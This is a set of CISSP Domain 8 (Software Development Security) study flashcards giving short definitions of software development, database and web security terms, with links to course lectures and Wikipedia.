Domain 8: Software Development Security Flashcards

Question

# Define: Capability Maturity Model Integration | (CMMI)

Answer 1

A model helping organizations streamline process improvement and encourage efficient behaviors that decrease risks in development and service delivery. ## Footnote An enhancement of the original Capability Maturity Model (CMM), CMMI is a process and behavioral model that helps organizations streamline process improvement and encourage productive, efficient behaviors that decrease risks in software, product, and service development. The model provides a set of best practices that guide businesses through a continuum of improvements from an initial, ad hoc state of processes to a mature, disciplined state. *For more information, view this lecture on [Maturity Models - Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182137-maturity-models-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Capability_Maturity_Model_Integration).*

Answer 2

A stylesheet language for describing the presentation of web pages, including defining fonts, colors, and layouts. ## Footnote A stylesheet language used for describing the presentation of a document written in a markup language. CSS is commonly used in web development to control the appearance and layout of web pages. Examples of using CSS include defining the font, color, and size of text on a webpage or setting the position and size of images and other elements on the page. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/CSS).*

Answer 3

Continuous Integration and Continuous Delivery/Deployment environments that integrate and deploy code changes rapidly and regularly. ## Footnote CI/CD stands for Continuous Integration and Continuous Delivery/Deployment. Continuous Integration involves integrating changes from different contributors into a central repository frequently, which encourages catching integration bugs early. Continuous Delivery/Deployment involves automating the release process to get validated changes deployed to production quickly and sustainably. From a security perspective, CI/CD environments should be set up to include automated security checks and tests at various stages, such as static code analysis for potential vulnerabilities and dynamic testing in staging environments, to ensure that security is a part of the process from start to finish. *For more information, view this lecture on [DevOps and DevSecOps](https://courses.thorteaches.com/courses/take/cissp/lessons/29669508-devops-and-devsecops). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/CI/CD).*

Answer 4

A component in programming languages like Java that loads class files for the program, crucial for secure class loading. ## Footnote In the context of programming languages like Java, a class loader is part of the runtime environment, responsible for finding and loading class files as required by the program. It plays a crucial role in Java's security model, as it's responsible for loading (or linking) classes in a secure manner from local file systems, network locations, or other sources. The class loader's security measures are critical in preventing unauthorized access to sensitive resources. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Java_Classloader).*

Answer 5

An environment variable in Java that determines where the Java Virtual Machine (JVM) looks for class libraries during execution. ## Footnote An environment variable in Java programming that tells the Java Virtual Machine (JVM) and Java technology-based applications where to find class libraries, including user-defined class libraries. This is crucial for the execution of Java applications, as CLASSPATH can be set to point to the directories where related class files are stored. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Classpath_(Java)).*

Answer 6

A software development process focused on defect prevention through statistical quality control and process management. ## Footnote A rigorous software development process aimed at producing defect-free software by applying engineering principles of process control and quality assurance. It emphasizes formal specification, incremental development, and statistical quality control, often involving automated tools to track defects and users' behavior to refine the software iteratively without introducing errors. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Cleanroom_software_engineering).*

Answer 7

The process of verifying data on the client's device before it is sent to a server, providing immediate feedback but not replacing server-side validation. ## Footnote The verification of data on the client side of a client-server interaction, usually before the data is sent to the server. This can include ensuring form fields are filled out correctly, input matches expected formats, and other checks. While enhancing user experience by providing immediate feedback, it must not be the sole method of validation due to the potential for bypassing by malicious users; server-side validation provides an additional necessary layer of security.

Answer 8

A consortium that contributed to database management systems and the COBOL language, establishing the network database model. ## Footnote An influential consortium established in the late 1950s that played a pioneering role in the development of database management systems and the COBOL programming language. CODASYL's work led to the creation of the network database model, a precursor to the relational model, which was widely used in business applications. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/CODASYL).*

Answer 9

Software that scans application code to identify vulnerabilities, errors, and adherence to coding standards, aiding in software quality improvement. ## Footnote Software utilities that scan application code to identify potential security vulnerabilities, programming errors, and adherence to coding standards and best practices. These tools are critical in improving the quality of software by detecting flaws early in the development lifecycle, reducing the risk of vulnerabilities being exploited, and minimizing the cost of remediation. *For more information, view this lecture on [SCA - Software Composition Analysis](https://courses.thorteaches.com/courses/take/cissp/lessons/54399265-new-2024-sca-software-composition-analysis). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Static_program_analysis).*

Answer 10

A legal arrangement where source code is held by an escrow agent, released to the licensee if the licensor fails to meet contractual obligations. ## Footnote A legal agreement involving at least three parties - a software licensing organization, the licensing customer, and an escrow agent. In this arrangement, the software's source code is given to an independent third party (the escrow agent) for safekeeping. The escrow agent releases the source code to the licensee in the event that the licensor fails to meet contractual obligations, such as maintenance, support, or bankruptcy, ensuring business continuity and access to critical functionalities. *For more information, view this lecture on [Software development methodologies part 4.](https://courses.thorteaches.com/courses/take/cissp/lessons/36620216-software-development-methodologies-part-4). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Source_code_escrow).*

Answer 11

A central location for storing, managing, and versioning software code, facilitating collaboration among developers and maintaining a historical record of changes. ## Footnote A centralized place where developers store, manage, track, and control different versions of software code. It enables collaboration, allowing multiple contributors to work on a project without overwriting each other's changes. This tool is vital for maintaining version control and enabling rapid recovery if necessary. Repositories can be hosted on a local server or on a cloud-based platform, with popular services including GitHub and Bitbucket. *For more information, view this lecture on [Software development methodologies part 4.](https://courses.thorteaches.com/courses/take/cissp/lessons/36620216-software-development-methodologies-part-4). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Repository_(version_control)).*

Answer 12

A thorough examination of source code by someone other than the author, aimed at identifying errors, security issues, and deviations from development guidelines. ## Footnote The systematic examination of source code, usually carried out by someone other than the author, with the goal of identifying bugs, security breaches, or violations of development guidelines. This process not only enhances the overall quality of the software but also promotes knowledge sharing among the team, leading to better understanding and collaboration. *For more information, view this lecture on [Software testing - Part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19180056-software-testing-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Code_review).*

Answer 13

Conventions that guide the writing of source code in a programming language to ensure readability, maintainability, and quality of the software product. ## Footnote A set of conventions or rules established for a specific programming language or development environment. These rules dictate the use of naming conventions, commenting, indentation, error handling, and more, with the intent of improving code readability, maintainability, and robustness. Adhering to such guidelines and standards is essential for facilitating team collaboration and ensuring the consistent quality of the software product. *For more information, view this lecture on [SAFe - Scaled Agile Frameworks](https://courses.thorteaches.com/courses/take/cissp/lessons/54399261-new-2024-safe-scaled-agile-frameworks). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Programming_style).*

Answer 14

The techniques and procedures that developers follow when writing code, focused on improving software quality and development efficiency. ## Footnote The methods and procedures that programmers follow when writing their code. Good coding practices aim to improve the quality of software and the efficiency of the development process. They may include techniques such as code reuse, modularization, commenting, consistent indentation, error handling, and adhering to naming conventions. These practices help ensure that the code is clean, readable, efficient, and easy to maintain and debug. *For more information, view this lecture on [SAFe - Scaled Agile Frameworks](https://courses.thorteaches.com/courses/take/cissp/lessons/54399261-new-2024-safe-scaled-agile-frameworks). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Programming_style).*

Answer 15

The extent to which elements within a module are related and contribute to a single task or function, with higher cohesion being preferable for security and maintainability. ## Footnote In software design, cohesion refers to the degree to which the elements inside a module belong together. In essence, it's the measure of how closely related the responsibilities of a module are. High cohesion in software modules is desirable as it promotes the maintainability and reliability of the software. This concept is important in the context of secure software design, as low cohesion can lead to software vulnerabilities due to poorly defined module boundaries. *For more information, view this lecture on [Databases - part 4.](https://courses.thorteaches.com/courses/take/cissp/lessons/36620229-databases-part-4). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Cohesion_(computer_science)).*

Answer 16

Readily available, pre-packaged software used by organizations to reduce development costs and time. ## Footnote A pre-packaged software that is readily available for purchase and use by organizations. It is used in businesses and government agencies to reduce the cost and time of software development. Examples include Microsoft Office and Adobe Photoshop. *For more information, view this lecture on [Buying software from other companies.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182140-buying-software-from-other-companies). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Commercial_off-the-shelf).*

Answer 17

A protocol that allows web servers to execute external programs to generate dynamic web content, which can introduce security risks. ## Footnote A standard that enables web servers to execute an external program, often a script, to generate dynamic web content. It acts as the interface between the web server and the program that generates the web page content. While CGI scripts can provide powerful functionality, they can also introduce security risks if not properly designed or isolated from sensitive system operations. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Common_Gateway_Interface).*

Answer 18

A computer program that translates high-level programming language code into machine code, essential for creating executable software applications. ## Footnote A computer program that translates source code written in a high-level programming language into machine code that can be executed by a computer. It is commonly used in software development to create efficient and optimized programs. Examples include GCC and Microsoft Visual C++. *For more information, view this lecture on [Programming Concepts - Part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182075-programming-concepts-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Compiler).*

Answer 19

A distinct part or element of a system that performs a specific function, whether hardware or software, designed for interchangeability and scalability. ## Footnote In the context of system architecture, a component is an individual part that performs a specific function within the larger system. It can refer to hardware elements (like a CPU or a hard drive), software elements (like a module or function), or sub-systems. Components typically interact with other elements within the system and are designed to be interchangeable or replaceable, promoting flexibility and scalability. *For more information, view this lecture on [Secure system design concepts.](https://courses.thorteaches.com/courses/take/cissp/lessons/18591293-secure-system-design-concepts). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Software_component).*

Answer 20

The use of tools to automate software development processes, enhancing software creation, testing, and maintenance. ## Footnote The use of computer-based tools to support the development, testing, and maintenance of software. It is used to automate and streamline the software development process and to improve the quality and reliability of software. Examples of CASE tools include modeling tools, code generation tools, and testing tools. *For more information, view this lecture on [Software Development Methodologies Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182089-software-development-methodologies-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Computer-aided_software_engineering).*

Answer 21

A programming approach using logical rules and constraints to represent and solve problems, often employed in AI and expert systems. ## Footnote A type of programming paradigm that uses logical constraints and rules to represent and solve problems. It is often used for tasks such as optimization, scheduling, and planning, as well as for artificial intelligence and expert systems. Examples of constraint-based programming languages include Prolog and Mercury. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Constraint_programming).*

Answer 22

A software development practice automating the preparation of code changes for release, aiming for rapid and reliable software delivery. ## Footnote A software development practice where changes to code, such as new features, bug fixes, and configuration changes, are built, tested, and prepared for release in an automated and efficient manner. This approach aims to make releases painless and low-risk events that can be performed at any time, on demand, ensuring the rapid and reliable delivery of software. *For more information, view this lecture on [DevOps and DevSecOps](https://courses.thorteaches.com/courses/take/cissp/lessons/29669508-devops-and-devsecops). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/CI/CD).*

Answer 23

A development practice where code changes are frequently integrated and tested, aiming for early detection of issues and improved software quality. ## Footnote A software development practice where developers regularly merge their changes into a central repository, after which automated builds and tests are run. The main goals of CI are to find and address bugs quicker, improve software quality, and reduce the time it takes to validate and release new software updates. *For more information, view this lecture on [DevOps and DevSecOps](https://courses.thorteaches.com/courses/take/cissp/lessons/29669508-devops-and-devsecops). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/CI/CD).*

Answer 24

Practices automating code integration into repositories and application deployment, streamlining development. ## Footnote Software development practices that automate the integration of code changes into a repository and the delivery or deployment of applications to production environments. CI/CD streamlines the development process, reduces the time to release, and enhances the reliability of software releases. *For more information, view this lecture on [DevOps and DevSecOps](https://courses.thorteaches.com/courses/take/cissp/lessons/29669508-devops-and-devsecops). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/CI/CD).*

Answer 25

The degree of interdependence between system modules, with low coupling being preferable for modularity. ## Footnote In the context of software design, coupling refers to the degree to which one module or component depends on another. High coupling indicates that a change in one module may require changes in other modules, while low coupling allows for a more modular and independent design. *For more information, view this lecture on [Databases - Part 4](https://courses.thorteaches.com/courses/take/cissp/lessons/36620229-databases-part-4). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Coupling_(computer_programming)).*

Answer 26

An attack coercing a web browser to perform unintended actions on a web application where a user is logged in. ## Footnote A cyber-attack that tricks a web browser into executing an unwanted action in a web application to which a user is logged in. It exploits the trust that a site has for the user's browser, potentially leading to actions like changing user settings, posting content without consent, or initiating transactions. Security measures against XSRF include anti-forgery tokens and same-origin policies. *For more information, view this lecture on [OWASP 2021 - Part 4](https://courses.thorteaches.com/courses/take/cissp/lessons/29670704-owasp-part-4). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Cross-site_request_forgery).*

Answer 27

A vulnerability allowing attackers to inject malicious scripts into webpages viewed by other users. ## Footnote A type of security vulnerability that targets web applications, XSS enables attackers to inject malicious scripts into webpages viewed by other users. By exploiting the trust a user has for a particular site, these scripts can access any cookies, session tokens, or other sensitive information retained by the user's browser related to that site, potentially leading to unauthorized actions. *For more information, view this lecture on [OWASP 2021 - Part 4](https://courses.thorteaches.com/courses/take/cissp/lessons/29670704-owasp-part-4). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Cross-site_scripting).*

Answer 28

Collecting and summarizing data from multiple sources, often used in analytics and business intelligence for informed decision-making. ## Footnote The process of collecting and summarizing information from multiple sources to achieve a consolidated view. Often used in data analytics, business intelligence, and reporting, it allows for more informed decision-making by presenting a comprehensive picture of collected data for analysis. Aggregation can involve compiling detailed data into summary form, computing sums, averages, counts, or other metrics that provide insight into trends, patterns, or performance across datasets. *For more information, view this lecture on [Database Security](https://courses.thorteaches.com/courses/take/cissp/lessons/19121852-database-security). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Data_aggregation).*

Answer 29

The process of examining data to extract actionable insights. ## Footnote Data analytics involves the systematic analysis of data using statistical methods, algorithms, and tools to uncover meaningful patterns, trends, and insights. This discipline helps organizations make informed decisions, optimize processes, and gain competitive advantages by transforming raw data into actionable intelligence and strategic foresight. *For more information, view this lecture on [Database Security](https://courses.thorteaches.com/courses/take/cissp/lessons/19121852-database-security). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Data_analytics).*

Answer 30

SQL syntax managing permissions on database objects, allowing or restricting user actions for secure database access. ## Footnote A type of syntax used in SQL databases that manages permissions on different database objects. DCL commands such as GRANT and REVOKE allow specific roles or users to access or restrict certain actions on the database, ensuring that only authorized individuals have the right level of access to perform their duties. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Data_control_language).*

Answer 31

A repository detailing data structure, content, and usage, ensuring consistency and aiding in effective data management. ## Footnote A centralized repository of information about data, such as its meaning, relationships to other data, origin, usage, and format. It serves as a guide for understanding the structure, content, and context of data sources, thereby helping ensure consistency across different parts of an organization and facilitating effective data management. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Data_dictionary).*

Answer 32

Processes and tools identifying, classifying, and analyzing data assets, crucial for governance, risk management, and compliance. ## Footnote Data Discovery Methods refer to a range of processes and tools used to identify, classify, and analyze an organization's data assets. They are crucial for data governance, risk management, and compliance, ensuring that sensitive data is properly handled and protected. Techniques include automated discovery using software to scan storage systems and databases, as well as manual reviews and audits. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Knowledge_extraction#Knowledge_discovery).*

Answer 33

Visual representations of data flow through an information system, illustrating inputs, processes, and outputs. ## Footnote Graphical representations that illustrate the flow of data through an information system. DFDs can map out the inputs, processes, storage, and outputs of data in a system. They are useful tools for visualizing system interactions, identifying potential bottlenecks or vulnerabilities, and for planning and improving system design. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Data-flow_diagram).*

Answer 34

A subset of SQL used to perform operations on data within a database, including retrieval, insertion, and deletion. ## Footnote A subset of SQL used to retrieve, insert, modify, and delete data in databases. DML includes commands such as SELECT, INSERT, UPDATE, and DELETE, enabling users to manage and manipulate data in relational database management systems. *For more information, view this lecture on [Databases - Part 3](https://courses.thorteaches.com/courses/take/cissp/lessons/36620227-databases-part-3). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Data_Manipulation_Language).*

Answer 35

Creating data element mappings between different models to ensure accurate data transfers during integration or ETL processes. ## Footnote The process of creating data element mappings between two distinct data models. Data mapping is used as a first step for a wide variety of data integration tasks, including data transformation or data mediation between a data source and a destination. It helps to define how individual data fields are matched from one database to another, ensuring that information is transferred accurately and correctly during system migrations, data consolidation, or ETL (Extract, Transform, Load) processes. It is fundamental in data management and integration activities. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Data_mapping).*

Answer 36

Developing conceptual data structures and specifications, critical for managing data as a resource and designing databases. ## Footnote The process of developing data structures and specifications. It involves creating a conceptual representation of data objects, the associations between different data objects, and the rules governing these associations. This is instrumental in managing data as a resource, promoting data sharing, increasing data consistency, and designing databases. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Data_modeling).*

Answer 37

Decomposing tables in a database to eliminate redundancy and ensure consistency, reducing data anomalies and inconsistencies. ## Footnote A systematic approach of decomposing tables to eliminate data redundancy and undesirable characteristics like insertion, update, and deletion anomalies. The goal of this technique is to reduce and even eliminate data redundancy, an issue that can lead to data anomalies and inconsistencies within databases or data storage systems. *For more information, view this lecture on [Databases - Part 2](https://courses.thorteaches.com/courses/take/cissp/lessons/19182105-databases-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Database_normalization).*

Answer 38

A format for organizing and storing data in a computer, enabling efficient access and modification, essential for data handling. ## Footnote A specialized format for organizing and storing data in a computer so that it can be accessed and modified efficiently. Different kinds of data structures are suited to different kinds of applications, and some are highly specialized for specific tasks. Data structures can include arrays, linked lists, stacks, queues, trees, graphs, and various types of tables and databases, each with its own strengths and use cases in the realm of computer science and data processing. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Data_structure).*

Answer 39

A structured set of data, often managed and accessed through a DBMS, essential for organization and manipulation of information. ## Footnote A structured set of data. It's a collection of schemas, tables, queries, reports, views, and other objects used to manage and organize information efficiently. Databases are essential in many environments as they provide an efficient way to store, retrieve and manipulate data, and can be protected by various security measures like encryption and access controls. *For more information, view this lecture on [Databases - Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182101-databases-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Database).*

Answer 40

A technology monitoring and analyzing database activity in real-time to detect unauthorized actions. ## Footnote A security technology that continuously monitors, records, and analyzes database activity in real-time. DAM is used to detect and prevent unauthorized or malicious actions within databases, alerting security teams to potential threats or policy violations. This technology helps in ensuring database security, compliance with data protection regulations, and operational integrity of database environments. DAM solutions typically provide functionalities such as real-time monitoring, alert generation, transaction log analysis, and automated response mechanisms. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Database_activity_monitoring).*

Answer 41

A professional managing databases, ensuring data availability and security, and performing maintenance tasks. ## Footnote A professional responsible for the installation, configuration, upgrade, administration, monitoring, and maintenance of databases in an organization. The DBA ensures data availability, security, and integrity and is often involved in disaster recovery, performance analysis, and optimization, along with managing database access roles and permissions. *For more information, view this lecture on [Databases - Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182101-databases-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Database_administrator).*

Answer 42

Software that catalogs and queries data, managing incoming data and organizing it for users or other programs. ## Footnote A software system that uses a standard method of cataloging, retrieving, and running queries on data. The DBMS manages incoming data, organizes it, and provides ways for the data to be modified or extracted by users or other programs. DBMSs are a crucial tool for handling large amounts of data across different industries and are central to the fields of databases and information systems. Examples include relational databases like MySQL, PostgreSQL, and Microsoft SQL Server, as well as NoSQL databases like MongoDB and Cassandra. *For more information, view this lecture on [Databases - Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182101-databases-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Database_management_system).*

Answer 43

Maintaining copies of databases on multiple systems to ensure availability and durability, aiding resilience against failures or breaches. ## Footnote A technique that involves maintaining copies of the same database on multiple computer systems. This is done not only to ensure data availability and durability but also as a measure of resilience in the face of technical failures or data breaches. If one server or database is compromised, operations can continue unaffected using the replicated databases, minimizing disruption and data loss. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Replication_(computing)#Database_replication).*

Answer 44

Weaknesses in database systems that can be exploited to access or manipulate data, requiring identification and mitigation. ## Footnote The weaknesses in a database system that can be exploited by malicious actors to gain unauthorized access, disrupt operations, or manipulate data. Such vulnerabilities could stem from a variety of factors, including but not limited to software bugs, improper configurations, weak security controls, or lack of timely updates and patches. Identifying and mitigating these vulnerabilities is crucial in protecting the data held within the database system. *For more information, view this lecture on [Software vulnerabilities and Attacks.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182134-software-vulnerabilities-and-attacks)*

Answer 45

Interactive applications providing data and tools to support decision-making, improving organizational efficiency. ## Footnote The interactive software applications used to help individuals or organizations make decisions by providing relevant data, models, or analytical tools. These systems are employed across various sectors and can help improve efficiency and accuracy in decision-making, ensuring the best possible outcomes based on the information available. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Decision_support_system).*

Answer 46

A Deepfake is a synthetic media creation, often video or audio, generated using AI techniques like deep learning to imitate real people’s appearances, voices, or behaviors convincingly. ## Footnote Deepfakes exploit advanced generative models—especially Generative Adversarial Networks (GANs)—to engineer highly realistic facial expressions or speech patterns. They can be used for entertainment, satire, or malicious activities, such as disinformation campaigns or blackmail. Detecting deepfakes involves analyzing subtle artifacts, inconsistencies in lighting, or unnatural blinking. Tech companies and researchers are developing and refining deepfake detection tools, while governments consider legal regulations to mitigate the risks of deception and reputational harm. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Deepfake).*

Answer 47

A methodology integrating software development and operations to reduce development time and enhance quality. ## Footnote A methodology that combines software development (Dev) and operations (Ops) with the aim of reducing the system development life cycle while delivering high-quality software and improving operational performance. DevOps fosters continuous integration, continuous deployment, and continuous monitoring in software development and operations, enabling quicker responses to changes and problems. *For more information, view this lecture on [DevOps and DevSecOps](https://courses.thorteaches.com/courses/take/cissp/lessons/29669508-devops-and-devsecops). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/DevOps).*

Answer 48

An approach that incorporates security into the DevOps process, including during software development phases. ## Footnote An extension of the DevOps methodology, this approach integrates security into the development and operation processes. It advocates for security considerations and controls to be included from the initial stages of software development rather than being an afterthought or standalone phase. It underscores a "security as code" culture with ongoing, flexible collaboration between release engineers and security teams. *For more information, view this lecture on [DevOps and DevSecOps](https://courses.thorteaches.com/courses/take/cissp/lessons/29669508-devops-and-devsecops). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/DevSecOps).*

Answer 49

Representations of data flow through systems, showing how information is handled and processed. ## Footnote Graphical representations of the flow of data through an information system. They map out the data inputs, processing steps, data storage, and output processes involved in handling data. DFDs are used for system analysis and design and can help in understanding the complexities of systems, ensuring that all components are well-integrated and that the system functions as intended. They are particularly useful in visualizing data exchange within and between systems, aiding in error detection, and enhancing communication among stakeholders. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Data-flow_diagram).*

Answer 50

Testing software behavior in real-time by executing programs to identify defects or vulnerabilities during operation. ## Footnote A method used in software testing where programs are executed in real-time to identify potential defects or errors. Unlike static analysis, which is performed without running the code, dynamic analysis tests the software's behavior under various conditions and inputs to find issues such as memory leaks, race conditions, or security vulnerabilities. It is an essential part of the quality assurance process, being able to simulate actual operating conditions and user interactions. *For more information, view this lecture on [SCA - Software Composition Analysis](https://courses.thorteaches.com/courses/take/cissp/lessons/54399265-new-2024-sca-software-composition-analysis). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Dynamic_program_analysis).*

Answer 51

Files containing code and data used simultaneously by multiple applications, essential for code reuse and memory efficiency. ## Footnote Modular files containing code and data that can be used by multiple applications simultaneously. DLLs allow for code reuse, modularization, and memory efficiency as the same library can serve multiple applications, reducing the need for redundant code. Their misuse or manipulation could lead to potential security vulnerabilities such as DLL hijacking or injection. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Dynamic-link_library).*

Answer 52

APIs enabling communication from a network controller to higher-level management systems or applications. ## Footnote In the context of networking, an Eastbound Interface API refers to the application programming interface that enables communication and data flow from a network controller toward higher-level management systems or applications. This type of interface facilitates the upward propagation of network information, such as topology details or traffic statistics, which can be used for analytics, policy decision-making, network optimization, or orchestrating services across the network. In Software-Defined Networking (SDN) environments, for example, the Eastbound API allows the SDN controller to interact with more abstract layers like service management platforms or business logic applications.

Answer 53

Facilitate internal communication and data exchange within an IT infrastructure, optimizing information flow. ## Footnote These APIs facilitate internal communications and data exchange between services and applications within an organization's IT infrastructure. Focused on optimizing the flow of information within the data center, East-West APIs are crucial for microservices architectures and containerized applications, where a high volume of internal traffic is common.

Answer 54

A mechanism to ensure input data adheres to defined formats and conditions before system processing, enhancing data accuracy and consistency. ## Footnote A mechanism used to validate the input data in a system. Edit control ensures that the data entered into a system adheres to predefined formats, ranges, or conditions before it is processed. This is important in maintaining the accuracy and consistency of the data and preventing the introduction of errors or anomalies that could lead to security vulnerabilities or incorrect system operation.

Answer 55

Processes in software systems to manage unexpected conditions, preserving system stability and data integrity when errors occur. ## Footnote The mechanisms and processes put in place in software systems to manage errors and exceptions. These mechanisms aim to gracefully handle unexpected or abnormal conditions (exceptions) that arise during a program's execution, thereby preserving system stability and data integrity. This could involve logging errors for further analysis, displaying user-friendly error messages, or recovering from an error state. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Exception_handling).*

Answer 56

A set of instructions currently running or ready to be executed by a computer's processor, performing specific system tasks. ## Footnote This refers to a set of instructions in a computer program that is currently being executed or is ready to be run by a computer's processor. Executable code can come in various forms, such as binary executable files, scripts, or sequences of instructions interpreted by an interpreter. It typically resides within an executable file, which can be a standalone program or part of a larger application, and is responsible for performing specific tasks or operating various functions within a software environment. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Executable).*

Answer 57

An AI system using knowledge-based rules to emulate human decision-making, often in specialized fields like medicine. ## Footnote A branch of artificial intelligence that uses a knowledge-based system to emulate the decision-making ability of a human expert. Expert systems are designed to solve complex problems by reasoning through bodies of knowledge, represented mainly as if-then rules rather than through conventional procedural code. They are often used to provide answers to questions, solve problems, or give advice in specialized fields like medicine, engineering, or finance. Expert systems use a 'knowledge base' and an 'inference engine' to simulate human expertise and derive conclusions. *For more information, view this lecture on [Artificial Intelligence (AI)](https://courses.thorteaches.com/courses/take/cissp/lessons/19182149-artificial-intelligence-ai). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Expert_system).*

Answer 58

A text format for structuring and transporting data, both human and machine-readable, widely used in web services. ## Footnote A flexible text-based format derived from SGML (Standard Generalized Markup Language) that is used to store and transport data. XML provides a way to structure data so that it can be both human and machine-readable. It is widely used for the representation of arbitrary data structures, such as those used in web services. XML is extensible because it allows users to define their own elements. Its purposes include but are not limited to, describing data, encoding documents, and serializing complex data structures across network connections. *For more information, view this lecture on [Web architecture and attacks](https://courses.thorteaches.com/courses/take/cissp/lessons/19148725-web-architecture-and-attacks). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/XML).*

Answer 59

A software development methodology focused on improving quality and responding to customer requirements. ## Footnote A software development methodology that is intended to improve software quality and responsiveness to changing customer requirements. As a type of agile software development, XP advocates frequent "releases" in short development cycles, which are intended to improve productivity and introduce checkpoints where new customer requirements can be adopted. Key practices include pair programming, extensive code review, unit testing of all code, and a flat management structure. The aim of XP is to enhance software project adaptability and reduce risks associated with client requirements changing during the software development process. *For more information, view this lecture on [Software development methodologies part 2](https://courses.thorteaches.com/courses/take/cissp/lessons/19182096-software-development-methodologies-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Extreme_programming).*

Answer 60

The organization of data within a file, which determines how it’s read, interpreted, and processed, crucial for data integrity. ## Footnote The structure and organization of data within a file. The layout can dictate how data is read, interpreted, and processed, and it often depends on the file format. Managing file layouts properly can have implications for data integrity and accuracy. For example, changing a file layout without adjusting the related processes can lead to misinterpretation of the data and potentially severe consequences.

Answer 61

A field in a database table that links to the primary key of another table, enforcing referential integrity. ## Footnote In databases, a foreign key is a column or set of columns in a relational database table that provides a link between data in two tables. It refers to the primary key of another table, establishing a relationship between the two tables and enforcing referential integrity. The foreign key identifies a column or a set of columns in one (referencing) table that matches the primary key or a unique key in another (referenced) table. The relationship between the two keys ensures that the data in the two tables remains consistent. *For more information, view this lecture on [Databases - part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182101-databases-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Foreign_key).*

Answer 62

High-level programming languages closer to human language, aimed at solving business problems or data queries. ## Footnote These are types of programming languages that are more abstract and closer to human language compared to third-generation languages. 4GLs often focus on reducing programming effort and specificity and are geared towards solving business problems or database querying. Examples include SQL (Structured Query Language) for database interactions, ABAP (Advanced Business Application Programming) used in SAP applications, Informix-4GL, and Progress 4GL, now known as OpenEdge Advanced Business Language. They enable developers to write code with higher-level constructs, and many provide capabilities for rapid application development, report generation, and data manipulation. *For more information, view this lecture on [Programming Concepts - Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182075-programming-concepts-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Fourth-generation_programming_language).*

Answer 63

Software available at no cost, often proprietary and supported by advertisements, donations, or as an entry-level product version. ## Footnote Software that is available for use at no monetary cost, typically distributed with a license that allows users to download, install, and utilize the software without any payment. Freeware may be proprietary, with the source code not available for modification or redistribution by users. It is often supported by voluntary donations, advertisements, or as a strategy to entice users to purchase a more capable paid version. Unlike open-source software, the rights to copy, modify, and redistribute freeware are usually restricted by the developer. Popular examples of freeware include Adobe Reader and Skype. *For more information, view this lecture on [Programming Concepts - Part 2](https://courses.thorteaches.com/courses/take/cissp/lessons/36454825-programming-concepts-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Freeware).*

Answer 64

